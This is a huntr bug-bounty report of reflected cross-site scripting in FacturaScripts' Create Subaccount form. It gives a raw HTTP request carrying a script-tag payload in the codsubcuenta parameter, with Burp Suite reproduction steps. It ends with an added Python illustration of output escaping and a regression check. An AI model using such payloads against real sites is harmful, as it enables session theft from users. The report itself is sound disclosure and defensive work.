Cross-site scripting - Reflected in Create Subaccount

huntr report 4578A690-73E5-4313-840C-EE15E5329741
Published: 2022-04-30 10:26:16
Reporter: nhienit2010
Source: www.huntr.dev

Tags: cross-site scripting, reflected, create subaccount, `codsubcuenta` parameter, burp suite, xss payload, accounting section

EPSS: 0.001
Percentile: 30.0%

Description

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

Proof of Concept

POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"

insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"

EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"

<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"

123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"

2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"

CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"

0
-----------------------------363416527826407339693188325960--

Steps to reproduce

  1. In the Accounting section, choose New and fill in the form with any values.
  2. Use Burp Suite to intercept this request, replace the codsubcuenta parameter value with the XSS payload and click Forward.
  3. The alert(1337) executes.
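As an added illustration, not code from the report or from FacturaScripts, the following shows the defect class and its fix: a value submitted in codsubcuenta is echoed back into the page, so the hardened renderer HTML-encodes it for both the attribute and the text context, and a small regression check confirms that the report's payload no longer appears unencoded. The two render functions are hypothetical stand-ins for the application's template, and the payload is taken from the PoC above.

```python
import html

# Payload as submitted in the report's multipart body (constructed copy).
POC_PAYLOAD = "<script>alert(1337)</script>"


def render_vulnerable(codsubcuenta: str) -> str:
    """Illustrative 'before': the submitted value is interpolated into the
    response unchanged, so any markup in it is parsed by the browser."""
    return (
        f'<input type="text" name="codsubcuenta" value="{codsubcuenta}">'
        f"<p>Subcuenta: {codsubcuenta}</p>"
    )


def render_fixed(codsubcuenta: str) -> str:
    """Illustrative 'after': HTML-encode the value once for both contexts.
    quote=True also encodes " and ', so a value cannot close the
    value="..." attribute and start a new one."""
    safe = html.escape(codsubcuenta, quote=True)
    return (
        f'<input type="text" name="codsubcuenta" value="{safe}">'
        f"<p>Subcuenta: {safe}</p>"
    )


def reflects_unescaped(page: str, submitted: str) -> bool:
    """Regression check for the fix: True when a submitted value that
    contains HTML metacharacters appears byte-for-byte in the response.
    Values without metacharacters are expected to round-trip unchanged."""
    has_meta = any(ch in submitted for ch in "<>\"'&")
    return has_meta and submitted in page


if __name__ == "__main__":
    print("vulnerable:", reflects_unescaped(render_vulnerable(POC_PAYLOAD), POC_PAYLOAD))
    print("fixed:     ", reflects_unescaped(render_fixed(POC_PAYLOAD), POC_PAYLOAD))
```

The same check can be pointed at a captured response from the EditSubcuenta endpoint to verify a deployed fix: if the raw payload is found, the parameter is still reflected without encoding.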
